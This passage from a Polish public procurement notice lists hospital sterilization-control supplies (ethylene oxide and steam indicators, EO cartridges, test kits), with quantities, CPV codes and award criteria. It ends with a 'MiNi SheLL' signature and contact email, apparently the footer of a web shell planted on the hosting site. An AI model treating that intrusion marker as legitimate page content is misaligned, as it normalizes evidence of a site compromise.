1.	Wieloparametrowy wskaźnik chemiczny klasy 4 do tlenku etylenu o liniowym ułożeniu substancji wskaźnikowej na długości 6-8cm. Zmiana koloru łatwa w interpretacji np. z bordowego na zielony. Zgodność z EN 867-1 lub EN ISO 11140-1.	4000 szt.
2.	Fiolkowy wskaźnik biologiczny o szybkim odczycie do tlenku etylenu. Ostateczny odczyt wyniku negatywnego/zabicie bakterii po 4 godzinach inkubacji. Na fiolce repozycjonowana nierwąca się naklejka ze wskaźnikiem chemicznym i miejscem do opisu	400 szt.
3.	a) Zestaw wskaźników biologicznych o szybkim odczycie do tlenku etylenu. Ostateczny odczyt wyniku negatywnego /zabicie bakterii po 4 godzinach inkubacji. 	500 szt.
	b) W zestawie autoczytnik do wskaźników biologicznych szybkiego odczytu o pojemności 12 wskaźników.	1 szt.
4.	Naboje gazowe kompatybilne ze sterylizatorem gazowym 3M model 5xl, zawierające 100 gram czystego EO, zgodne z instrukcja użytkowania sterylizatora i dopuszczone przez producenta sterylizatora. 	1300 szt.
5.	Oryginalny papier do drukarki sterylizatora, kompatybilny ze sterylizatorem gazowym Steri-Vac 5xI (modele produkowane od 2000r-nr seryjny powyżej 720000) i Steri-Vac 8xI.Rolka 79mmx30m.	60 rolek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.12.41.31-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 48.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wskaźniki do kontroli sterylizacji parą wodną.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
ilość szt.
1.	Wieloparametrowy, paskowy wskaźnik chemiczny do pary wodnej (liniowy), do kontroli sterylizacji parą wodną we wszystkich cyklach. Klasa D wg normy europejskiej 867-1 i klasa 4 wg normy międzynarodowej ISO11140-1.
Substancja wskaźnikowa umieszczona na całej długości paska. Pasek perforowany z możliwością podziału na dłuższy i krótszy pasek. Możliwość stosowania w pakietach jednorodnych (jeden rodzaj materiału) jak i niejednorodnych. Prawidłowy wynik sterylizacji wskazany przez definitywną zmianę koloru pola referencyjnego umieszczonego na środku paska. Temperatura 121°C i 134°C.	200.000 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2, 33.77.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 48.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Materiały eksploatacyjne do sterylizatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
ilość szt./ rolek
1.	Papier termiczny do drukarki sterylizatora, kompatybilny z drukarką sterylizatora HS 33 firmy Getinge	80 rolek
2.	Koperty systemu dokumentacji wym. A4 do zapisywania informacji 
i przechowywania dokumentów potwierdzających prawidłową pracę sterylizatora, posiadająca miejsce na wklejenie testów Bowie - Dick z poz. 1 części 1, testów systemu kontroli wsadu z poz. 2 części 1. Nadruk na kopercie dwustronny do archiwizacji przebiegu cykli w dwóch sterylizatorach (wzór koperty zostanie załączony do umowy).	5.800 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.77.20.00-2, 30.19.76.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 48.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Materiały eksploatacyjne do zgrzewarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
ilość szt./ rolek
1.	Testy do kontroli prawidłowości zgrzewania w zgrzewarkach rotacyjnych	8000 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 48.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Sporale.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
ilość szt.
1.	Biologiczny wskaźnik kontroli procesu sterylizacji parą wodną w nadciśnieniu Sporal A	700 szt.
2.	Biologiczny wskaźnik kontroli procesu sterylizacji suchym gorącym powietrzem Sporal S	400 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 48.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kontrola prawidłowości przeprowadzonej dezynfekcji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa	Zapotrzebowanie orientacyjne na okres 4 lat 
ilość szt.
1.	Test wykrywający pozostałości białka na mytych i/ lub dezynfekowanych narzędziach chirurgicznych, wyrobach medycznych i innych powierzchniach. Zasada działania oparta na reakcji biuretowej. Wynik porównywalny z testem nihydrynowym, zgodnie z PN EN ISO 15883-1. Odczyt wyniku po inkubacji w kontrolowanych temperatury 55°C na podstawie zmiany zabarwienia. Wynik otrzymywany po 15 min/55°C. Bez konieczności przechowywania w lodówce. Do opakowania testów dołączona butelka płynu nawilżającego. Pakowane po 50 szt.	7000 szt.
2.	Inkubator do testów pozostałości białkowych, kompatybilny z testami z poz. 1. Pojemność 24 komory inkubacyjne. Regulacja temperatury w zakresie od 0 do 150°C. Dokładność pomiaru 0,1°C. Wyświetlacz aktualnej i nastawionej temperatury inkubacji.	1 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 48.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com